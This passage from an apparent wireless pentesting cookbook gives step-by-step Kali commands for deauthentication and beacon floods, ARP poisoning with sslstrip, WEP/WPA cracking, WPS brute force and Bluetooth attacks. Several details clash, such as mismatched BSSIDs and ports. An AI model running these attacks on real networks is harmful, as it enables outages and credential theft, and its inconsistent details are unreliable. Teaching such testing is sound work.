Chapter 5: Attacking Network Availability

In this chapter, we will cover the following topics:

• Executing a de-authentication flood attack
• Identifying beacon frames
• Spoofing beacon frames
• Creating a beacon flood attack
• ARP cache poisoning

Introduction

We have already explored two components of the CIA triad: confidentiality and integrity. Now, we focus on the third pillar: availability. In simple terms, availability concerns the loss of access to resources such as files, computers, or entire networks, as we will see in this chapter. Losing access to a resource essentially makes it worthless until access is restored. This can be highly disruptive, potentially halting tasks or operations.

Consider a wireless network environment where clients depend on constant, reliable access to files, servers, or the internet. If this access is lost, a business or customer may become unable to function effectively. Partial or hindered availability can also severely impact operations. Imagine a crowded wireless network in a coffee shop or airport that is extremely slow and unreliable. Even if access exists, its poor performance can bring business to a standstill. This is unacceptable and must be addressed.

Mitigating availability attacks in wireless networks is challenging but feasible. Several options exist to make your network more resilient. Here are some potential countermeasures:

• Tuning: Configure your wireless access points to avoid channels and frequencies used by others. This can significantly reduce slowdowns, loss of availability, and range reduction caused by frequency contention and channel congestion. However, you may not always have exclusive use of a channel. Choose a less congested channel for more bandwidth.
• Redundancy: Implement a mesh network, where multiple access points cover an area. If one or more access points become congested, another node can provide clients with a stronger, more reliable signal. While requiring planning, this can yield substantial benefits for slow or congested networks. Modern mesh network solutions are now more user-friendly and cost-effective, suitable for environments from homes to large enterprises.
• Enterprise Authentication: Although mentioned in chapters on confidentiality and integrity, enterprise authentication systems (like RADIUS) also enhance availability. They make it harder for attackers to disrupt network authentication and launch denial-of-service attacks. This forces attackers to exert more effort to take the network offline compared to a standalone access point. The trade-off is increased complexity and expertise required for setup.
• Patches and Updates: Regularly patching and updating firmware and software is crucial. This ensures you are using the latest features and fixes, some of which can help thwart denial-of-service and other availability attacks.
• Configuration: Configuration covers a wide range of aspects, including access point placement, antenna type, the area to be covered, and the number of users requiring wireless access while moving.

This list is not exhaustive. It is essential to stay informed about availability issues, as they significantly impact user perception and acceptance of a wireless network. While confidentiality and integrity are important, users are more likely to notice problems related to availability. Slow or unavailable networks must be addressed from both a user satisfaction and a security standpoint.

Attack Types

There are numerous ways to affect wireless network availability, all sharing the goal of preventing effective connection and use, or causing total network outage.

Before delving into specific attacks, let's define those covered in this chapter:

• Executing a de-authentication flood
• Detecting beacon frames
• Spoofing beacon frames
• Executing a beacon flood
• ARP cache poisoning
• Executing denial-of-service
• Hiding a wireless network

These attacks represent some of the more popular methods for impacting wireless network availability. Other intentional and accidental availability attacks exist, so further research is recommended.

Executing a De-authentication Flood

A de-authentication flood is an interesting and highly effective first attack. The attacker attempts to break the association between a client and an access point. The client will be disconnected and forced to try reconnecting. If the flood is sustained at a high volume, no client can connect to the wireless network for an extended period or at all, depending on the conditions.

It is important to distinguish this attack from jamming. Jamming involves sending out radio signals to block or hinder the frequency used by the wireless network, often using a device that bombards the airwaves with radio traffic. Jamming is indiscriminate; you cannot selectively block only specific clients or networks. Additionally, jamming is often illegal and can result in heavy fines or imprisonment. We will not use jamming in this book.

De-authentication floods are sometimes mistakenly called jamming attacks. However, the attack we are discussing is selective and uses specially crafted frames to target its victim(s), rather than indiscriminate radio traffic.

You might wonder why de-authentication frames exist in wireless networks. They are used to disconnect misbehaving clients or those that need to be disconnected for some reason. For example, they can be used to disconnect malicious clients from your network. Another, more malicious use is to force clients to connect to a rogue access point controlled by the attacker. In this scenario, the attacker sets up their own access point near a legitimate one, sends de-authentication frames to disconnect users from the legitimate network, and then waits for them to connect to the attacker's available access point. The diagram below shows the normal authentication process, and how de-authentication fits in.

One semi-legitimate (used loosely here) use of de-authentication frames involved a hotel chain that used them to force guests to use the hotel's Wi-Fi instead of external providers. The hotel used devices to send de-authentication frames, blocking guests from using external Wi-Fi hotspots, forcing them to pay for the hotel's service. This practice faced legal challenges and is illegal in the United States, with the FCC imposing heavy fines on any business using such techniques.

There is ongoing debate about whether de-authentication floods can be used to create secure spaces where only authorized personnel can access the network. Currently, there is no clear-cut answer.

Another use for de-authentication frames is for sniffing network password or key during penetration testing. The attacker sends de-authentication frames, disconnecting a client. When the client reconnects, the attacker sniffs the generated traffic to capture the handshake. This can also be used for man-in-the-middle attacks, where the attacker de-authenticates the client and forces them to re-authenticate through a malicious access point, capturing credentials as part of the handshake.

Preparation

To begin, you'll need the following:

• A wireless network card capable of monitor mode
• Kali Linux

How to Do It...

To perform an association flood, we'll combine steps from earlier chapters with some additional parameters.

In this scenario, a client is connected to an access point or router. The attacker will attempt to interrupt this connection.

1. First, put your network card into monitor mode. Assuimng your wireless adapter is named wlan0, use the following command:

airmon-ng start wlan0

The utility will switch the card to monitor mode and rename it to something like mon0. This allows you to view all traffic. The screenshot below shows the result of the command.

2. Use the airodump-ng tool to capture information from the monitor interface:

airodump-ng mon0

This displays a list of wireless access points within range, including their ESSID, channel, and BSSID.

3. Select a network and focus the command on it using its BSSID. This will show a list of connected clients:

airodump-ng mon0 -c 1 -bssid 00:05:59:49:A7:A0

Here, -c specifies the channel, and -bssid is the access point's MAC address.

The output will show current client connections. Note the MAC address of the client you want to disconnect, e.g., 00:13:CE:AC:70:BE.

4. Finally, de-authenticate the client from the access point:

aireplay-ng -0 1000 -a 00:05:59:49:A7:A0 -c 00:13:CE:AC:70:BE mon0

Here, -0 indicates a de-authentication attack, 1000 is the number of de-authentication packets to send, -a is the router's MAC address, -c is the client's MAC address, and mon0 is the interface.

The screenshot below shows a successful attack. The client is disconnected and cannot re-establish a connection until the attacker stops sending de-authentication messages.

Detection of Beacon Frames

Beacon frames are sent by wireless access points to announce the network's name (SSID), parameters, and other maintenance information. They are transmitted periodically to inform clients of the network's presence.

Here's a breakdown of the components within a beacon frame:

• Timestamp: Synchronizes all clients on the network to the same time, allowing for more efficient operation.
• Beacon Interval: Indicates how frequently the beacon frame is sent. This is configurable on some networks, though not on most consumer-level devices.
• Capability Information: Describes the network's format (infrastructure or ad hoc), whether security features are used, and the type of encryption supported. This information reveals how the network operates.

Adjusting the beacon interval can have trade-offs. A shorter interval allows clients to associate and rove faster but increases network overhead, potentially reducing throughput. A longer interval reduces overhead but slows down association and roaming. Network egnineers typically avoid changing the beacon interval unless necessary.

Clients scan for beacon frames to discover available networks. Even after associating with a network, clients continue scanning for other networks to enable seamless roaming if the current network becomes inadequate. Beacons also help synchronize clocks and notify clients of upcoming changes like speed or channel.

Let's capture and analyze beacon frames to understand their content. This is not an attack itself but a precursor to the attacks we'll cover next.

Preparation

You will need:

• A wireless network card supporting monitor mode
• Kali Linux with Wireshark installed

How to Do It...

Kismet is a tool for locating and extracting information from wireless access points and devices. Here, we'll use it to detect beacon frames.

1. Open a terminal and run kismet.
2. Configure Kismet from the semi-graphical interface using the Tab and Enter keys.
3. If you see a gray line with No, use Tab to highlight Yes to confirm to start the Kismet server.
4. Press Enter to confirm.
5. Press Enter again to confirm you're running Kismet as root.
6. Press Enter to start the Kismet server automatically.
7. Press Enter again to confirm.
8. Press Enter to verify adding a capture source.
9. Enter your wireless interface name (e.g., wlan0) in the "Name" field. The screenshot below shows the interface input screen.

10. Press Tab, then Enter.
11. If the name is correct, Kismet will identify the interface. It may also generate virtual interfaces like wlan0mon.
12. When "Close Console Window" appears in the lower-right corner of the shell, use Tab to highlight it and press Enter.
13. A list of access points will appear in the upper-left quadrant of the shell.
14. Click "View" from the dropdown menu, then "Monitor Activity."

Access point names and details will quickly populate the interface. The information is extracted from the transmitted beacon frames. You will see the name, channel, wireless standard, and other details. Over time, more data may appear for devices that were previously missing some information.

You might notice some interesting entries. For example, you might see a "Probe Networks" section. Expanding it reveals a list of networks from probe requests sent by nearby systems attempting to connect to networks they've previously associated with. This can reveal which networks a system has connected to.

Kismet is passive, meaning it only listens and does not send any frames to trigger responses. It can also detect hidden access points that other tools might miss.

Spoofing Beacon Frames

Now that we understand beacon frames, we can explore how to spoof them. By manipulating beacon frames, an attacker can disrupt a network's operation, slowing it down or making it unavailable.

A key weakness exploited in beacon frame spoofing is the lack of verification or authentication of these frames. While some solutions can detect spoofed frames, this is not common practice. The detection is further complicated by the instability of wireless networks and varying communication methods from different vendors.

It is important to note that spoofing beacon frames is not a trivial attack. It requires patience and effort to execute correctly. However, it is detectable with advanced techniques. Network owners need to understand the potential and deploy appropriate protections.

The process of spoofing beacon frames has two main stages:

1. Enable Monitor Mode: Using airmon-ng to put the wireless adapter into monitor mode.
2. Send Spoofed Beacons: Using a tool like mdk3, which can generate and send beacon frames with custom names and attributes. This can create a large number of fake access points, confusing and slowing down clients, and potentially disrupting their current connections. This effectively creates a denial-of-service condition.

Preparation

You will need:

• A wireless network card supporting monitor mode
• Kali Linux

How to Do It...

1. Put your wireless adapter into monitor mode:

airmon-ng start wlan0

This will rename the interface to, for example, mon0.

2. Use airodump-ng to gather information about nearby wireless access points:

airodump-ng mon0

3. Once you have a target network, use mdk3 to spoof a beacon frame. For example, to create a fake network named "impa":

mdk3 mon0 b -n "impa" -b 54 -w a -m -c 11

• b: activates beacon flood mode.
• -n "impa": sets the network name.
• -b 54: sets the bitrate to 54 Mbps.
• -w a: enables only WPA2/AES security.
• -m: uses only valid MAC addresses to make filtering harder.
• -c 11: sets the channel to 11.

After this, another wireless device scanning the area should see a new network named "impa."

Creating a Beacon Flood

This recipe builds on the previous one by creating a flood of beacon frames. Instead of a single fake access point, we will continuously send numerous fake beacon frames to confuse nearby clients and cause performance issues. Under certain conditions, a beacon flood can cause scanners, software, or drivers to malfunction or crash, creating a denial-of-service condition. The concept is shown in the diagram below.

By varying the parameters and channels of the fake access points, we can refine and enhance the attack. The initial steps are the same as the previous attack; the difference lies in using the mdk3 utility to change these parameters.

Preparation

You will need:

• A wireless network card supporting monitor mode
• Kali Linux

How to Do It...

1. Put your wireless adapter into monitor mode:

airmon-ng start wlan0

2. Use airodump-ng to list nearby access points. Note the target's BSSID and channel.

airodump-ng mon0

3. To perform the beacon flood:

mdk3 mon0 b -t <BSSID target> -c <channel>

To control the flood rate, you can add the -s option:

mdk3 mon0 b -t station/bssid -s 360

Here, 360 is the number of packets transmitted per second.

To observe the flood, you can run Kismet on another Kali workstation. You will see a large number of beacons representing the attack.

ARP Cache Poisoning

This technique manipulates existing network components to perform operations like sniffing or man-in-the-middle attacks. ARP, or Address Resolution Protocol, links a logical IP address to a physical MAC address.

Here's how ARP works: Client A wants to communicate with Client B on the same subnet. Client A checks its ARP cache for a mapping of Client B's IP address to a MAC address. If found, it uses that information. If not, Client A sends an ARP broadcast on the subnet. Client B, upon receiving this broadcast, sends back its IP and MAC address combination. Client A then uses this information to address and send data. This mapping is also stored in the local ARP cache for future use. A screenshot of an ARP cache is shown below.

During an ARP cache poisoning attack, the attacker sends a forged ARP reply to the victim. The attacker doesn't wait for the victim to send an ARP request; they actively inject the reply. The reply contains a false IP-to-MAC mapping. For example, the victim might be looking for the MAC address associated with a particular IP. The attacker's forged reply maps that IP to the attacker's MAC address. When the victim caches this false mapping, future traffic intended for the original IP address will be sent to the attacker's system. The process is illustrated in the diagram below.

There are two sides to IP-to-MAC resolution: ARP (used to resolve IP to MAC) and RARP (Reverse ARP) which resolves MAC to IP. While they are companion protocols, we only need ARP for this attack.

Preparation

You will need:

• A wireless network card supporting monitor mode
• Kali Linux

How to Do It...

1. Enable IP forwarding. This allows traffic to be redirected through the attacker's system.

echo "1" > /proc/sys/net/ipv4/ip_forward

Verify it is set:

cat /proc/sys/net/ipv4/ip_forward

The output should be 1. Run sysctl -p to apply the change.

2. Redirect traffic using iptables. For example, redirect traffic destined for port 80 to port 8080, and port 443 to port 8883:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8880
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8883

3. Use arpspoof to change the victim's ARP cache. For example, to change the default gateway's MAC address in the victim's cache:

arpspoof -i eth0 -t 192.168.1.23 192.168.0.253

Similarly, perform the reverse to poison the gateway's cache:

arpspoof -i eth0 -t 192.168.0.253 192.168.1.23

After this, you can capture requests in transit using tools like sslstrip or driftnet.

• sslstrip: A sniffing and man-in-the-middle tool designed to capture information transmitted via SSL. Use it like this:

python /usr/share/sslstrip/sslstrip.py -p -s -l 8880

Captured data will be logged in /usr/share/sslstrip/sslstrip.log.

• driftnet: A GUI-based tool that captures images viewed from a browser. Simply run driftnet in a terminal. The output will be displayed as shown below.

Chapter 6: Authentication Attacks

This chapter explores attacks targeting authentication mechanisms and related components. Successfully attacking authentication can allow an attacker to gain easy access to systems and resources. We will start by understanding what authentication is and how it works.

When a user logs into a system, they first provide an identity (e.g., username). This identity alone is insufficient for access. The user must then undergo authentication to prove they are the person they claim to be, typically by providing a password or some secret information. The authentication process is shown in the diagram below.

There are three widely recognized factors of authentication:

• Factor 1 (Knowledge): Something you know, like a password, passphrase, or PIN. This is the most common form of authentication.
• Factor 2 (Possession): Something you have, like a key, ATM card, or a token that generates a special code. This is less common in wireless networks, but is used for accessing corporate or guest networks.

• Factor 3 (Inherence): Something you are, also known as biometrics. This uses characteristics like fingerprints, iris patterns, or facial recognition. This is rarely used for wireless authentication.

Authentication verifies your identity but does not grant access. Access is determined by authorization, which compares your verified identity against a set of rules configured by the system owner.

Authentication is not limited to wireless; it protects various applications, devices, and networks. In wireless networks, authentication involves several technologies:

• Encryption: Crucial for protecting the confidentiality and integrity of credentials in transit and storage.
• Pre-Shared Key (PSK) Systems: Uses a common key on all devices for authentication. This is common in home and small business environments, typically as non-enterprise WEP, WPA, or WPA2.
• Enterprise Authentication: Uses a centralized authentication server (e.g., RADIUS) for scalable and centrally managed authentication. This is preferred in larger environments.

Attack Types

Attacks targeting wireless authentication include:

• WEP attacks
• WPA attacks
• WPA2 attacks
• WPS attacks

WEP Attacks

WEP (Wired Equivalent Privacy) was an early security protocol designed when wireless security was still nascent. It had significant weaknesses, making it a prime target for attacks. WEP is obsolete and should not be used in any active network due to its vulnerability.

WEP used the RC4 encryption protocol with a 40-bit key plus a 24-bit initialization vector (IV). The 40-bit key length was a major weakness due to export restrictions at the time. Later, the key length was increased to 104 bits plus 24-bit IV (128-bit total), but the protocol remained flawed.

WEP supports two authentication methods:

• Open System Authentication (OSA): No authentication is performed; any client can associate. However, the WEP key is still used for encryption.
• Shared Key Authentication (SKA): Clients must provide the WEP key to authenticate. This is a four-step process: the client requests authentication, the AP sends a challenge, the client encrypts the challenge with the WEP key, and the AP decrypts it and compares it with the original challenge. If they match, authentication is successful. A diagram of the WEP process is shown below.

While SKA might seem more secure, it can actually be less secure because the challenge and encrypted response are exchanged, potentially revealing information about the key.

The vulnerability of WEP stems from the short 24-bit IV. On a busy network, the same key can be reused relatively quickly. Approximately 5,000 packets can be enough for a 50% chance of key reuse. By capturing enough packets (e.g., 250,000 for a 64-bit key, 1,500,000 for a 128-bit key), an attacker can recover the key. This is often done within minutes.

Preparation

You will need:

• A wireless network card supporting monitor mode
• Kali Linux
• A second wired or wireless adapter connected to the internet

How to Do It...

The goal is to capture enough IVs to crack the WEP key. This can be sped up by injecting packets into the network to generate more traffic. The steps are:

1. Enable monitor mode on the specific channel of the target AP:

airmon-ng start wlan0 9

Here, 9 sets the channel to 9 (adjust to the target's channel).

2. Test injection ability:

aireplay-ng -9 -e ganon -a 00:28:6C:E4:40:80 wlan0

Replace ganon with the network name and the MAC address with the target's BSSID.

3. Capture packets with airodump-ng:

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output wlan0

This captures traffic to files with the prefix "output".

4. Perform fake authentication with the access point:

aireplay-ng -1 0 -e ganon -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 wlan0

Here, -1 indicates fake authentication, 0 is the reassociation timing, and -h is our card's MAC address.

Alternatively, for more finicky APs:

aireplay-ng -1 6000 -o 1 -q 10 -e ganon -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 wlan0

If successful, you will receive a message indicating successful association.

5. Inject ARP packets to generate traffic:

aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 wlan0

This will start injecting ARP requests. The number of packets captured by airodump-ng should increase rapidly.

6. Attempt to crack the key:

aircrack-ng -b 00:14:6C:7E:40:80 output*.cap

This can be run while the injection is ongoing. The WEP key will be calculated and presented. The key will be in hexadecimal format, often with colons between characters.

WPA and WPA2 Attacks

WPA (Wi-Fi Protected Access) was designed as an immediate upgrade from WEP to address its vulnerabilities. It was based on the IEEE 802.11i standard and implemented TKIP (Temporal Key Integrity Protocol), which dynamically generates a new 128-bit key for each packet. WPA also introduced a Message Integrity Check (MIC) to prevent packet tampering and replay attacks. A diagram of the WPA process is shown below.

WPA has two main authentication modes:

• WPA Personal (WPA-PSK): Uses a pre-shared key (PSK), a 256-bit shared key. This is suitable for home and small office networks without a centralized authentication server.
• WPA Enterprise (WPA-802.1x): Uses a centralized authentication server (like RADIUS) for enterprise networks. This provides stronger security and centralized management. A diagram of the enterprise process is shown below.

• Wi-Fi Protected Setup (WPS): A simplified setup mechanism for WPA/WPA2 networks. It is discussed in detail in the next recipe.

Preparation

You will need:

• A wireless network card supporting monitor mode
• Kali Linux
• A second wired or wireless adapter connected to the internet

How to Do It...

The goal is to crack the WPA PSK by capturing the four-way handshake when a client connects to the network.

1. Enable monitor mode on the interface:

airmon-ng start wlan0

If you encounter errors, use airmon-ng check kill first.

2. View the target network and its clients:

airodump-ng wlan0

Keep this terminal open.

3. Capture packets on the target channel:

airodump-ng -c channel -bssid [bssid of wifi] -w [path to write the data] wlan0mon

4. De-authenticate a connected client to capture the handshake:

aireplay-ng -deauth 10 -a [router bssid] interface

You can optionally specify a client MAC with -c <client mac>. The client will be disconnected and when it reconnects, the four-way handshake will be captured.

5. Crack the PSK using a wordlist:

aircrack-ng -b [bssid of router] -w [path to word list] [path to capture packets]

For example:

aircrack-ng -b 00:14:6C:7E:40:80 -w /root/Desktop/wordlist.txt capture.cap

Replace the paths with your own. A wordlist can be downloaded or found within Kali Linux.

Attacking WPS

WPS (Wi-Fi Protected Setup) was introduced to simplify the process of connecting clients to WPA/WPA2 secured networks. It is available only if both the router and client support it.

WPS can work in several ways:

• Push Button Configuration (PBC): Press a button on the router and then a button on the client device.
• PIN Entry: The router has an 8-digit PIN (often printed on a label). The client enters this PIN to connect.

The PIN method is vulnerable to brute-force attacks because the PIN is divided into two 4-digit parts. The last digit is a checksum, leaving 7 effective digits. The first 4 digits have 10,000 combinations, and the last 3 have 1,000 combinations, totaling 11,000 possible PINs. On average, only 5,500 guesses are needed to find the correct PIN. This is trivial for modern computers.

Preparation

You will need:

• A wireless network card supporting monitor mode
• Kali Linux

How to Do It...

1. Start monitor mode:

airmon-ng start wlan0

2. Use wash to find WPS-enabled networks:

wash -i mon0

This will list networks, showing their WPS lock status (unlocked networks are more likely to be vulnerable).

3. Use reaver to brute-force the WPS PIN:

reaver -i mon0 -c 6 -b 00:23:69:48:33:95 -vv

Replace the channel (-c) and BSSID (-b) with those of your target. The -vv flag enables verbose output.

Once the PIN is cracked, reaver will reveal the WPA password.

Chapter 7: Bluetooth Attacks

This chapter explores Bluetooth technology, its vulnerabilities, and related attacks.

A Brief History of Bluetooth

Bluetooth was invented by Ericsson in 1989. It was initially designed as a short-range radio technology for communication between personal computers and headsets. The goal was to enable different devices to communicate wirelessly over short distances. The name "Bluetooth" comes from the 10th-century Danish king Harald Bluetooth, who united warring tribes. Similarly, Bluetooth technology unifies different technologies under a single standard. The Bluetooth logo is a combination of the king's initials.

Bluetooth operates in the 2.4 GHz ISM band and uses frequency-hopping spread spectrum. It is a packet-based protocol with a master-slave architecture. A master device can communicate with up to seven slaves in a piconet.

Bluetooth Operations

Devices communicate through a pairing process. One device is set to discoverable mode (like a Wi-Fi SSID). The other device scans for it, selects it, and confirms a PIN code. This establishes a trusted connection.

The Bluetooth Protocol Stack

The protocol stack includes core protocols (Baseband, LMP, L2CAP, SDP), cable replacement protocol (RFCOMM), telephony control protocol (TCS Binary, AT commands), and adopted protocols (PPP, UDP/TCP/IP, OBEX, WAP, vCard, etc.). The Host Controller Interface (HCI) provides a command interface for tools like hciconfig, hcidump, and hcitool.

Bluetooth Vulnerabilities

Bluetooth has several vulnerabilities:

• Software Vulnerabilities: Bugs in software and drivers can be exploited.
• Eavesdropping: Though encryption helps, older Bluetooth versions use weaker encryption.
• Denial-of-Service (DoS): Disrupting Bluetooth signals or overwhelming a device.
• Hardware Defects: Many devices, like cheap headsets, lack firmware updates to fix vulnerabilities.
• Default Values: Some devices have hardcoded PINs that cannot be changed, making them easy targets.

Choosing Bluetooth Hardware

Most modern devices have built-in Bluetooth. For enhanced performance, such as increased range (from the standard ~10 meters to hundreds of feet), a specialized Bluetooth adapter with an external antenna may be necessary. For tasks like packet injection, a dedicated external adapter is almost always required.

Attack Types

Attacks covered in this chapter include:

• Bluesmacking
• Bluetooth Hijacking (Bluejacking)
• Bluesnarfing
• MAC Address Spoofing
• Man-in-the-Middle Attacks

1. Bluesmacking (Bluetooth DoS)

This is a DoS attack where an oversized packet is sent to a Bluetooth device, potentially causing it to freeze, crash, or reboot. This is similar to the classic "ping of death" attack. Use tools like l2ping to send large pings.

Preparation: A Bluetooth adapter, Kali Linux.

How to Do It:

1. Check the adapter: hciconfig
2. Bring it up: hciconfig hci0 up
3. Scan for devices: hcitool scan
4. Ping a device: l2ping <MAC Address>

2. Bluetooth Hijacking (Bluejacking)

This is like sending unsolicited messages via Bluetooth. It does not gain control of the device; it's essentially spam via OBEX protocol. This can be done by creating a new contact with the message and sending it via Bluetooth.

Preparation: Bluetooth adapter, Kali Linux.

How to Do It:

1. Go to contacts and create a new contact.
2. Enter the message in the name field.
3. Send the contact via Bluetooth.
4. Select a target device from the scan.
5. Send.

3. Bluesnarfing

This is an unauthorized access to a device, typically a phone or laptop, over a Bluetooth connection. It can allow an attacker to access data like contacts, images, and videos. It often involves brute-forcing the device's MAC address or exploiting vulnerabilities.

Preparation: A wireless network card in monitor mode, Kali Linux, Bluesnarfer tool (or similar).

How to Do It:

1. Configure rfcomm: mkdir -p /dev/bluetooth/rfcomm, mknod -m 666 /dev/bluetooth/rfcomm/0 c 216 0, mknod --mode=666 /dev/rfcomm0 c 216 0, hciconfig -i hci0 up, hciconfig hci0
2. Scan for devices: hcitool scan
3. Ping the victim: l2ping <victim mac addr>
4. Browse services: sdptool browse --tree --l2cap <mac addr>
5. Use Bluesnarfer to access data: Bluesnarfer -r 1-100 -C 7 -b <mac addr>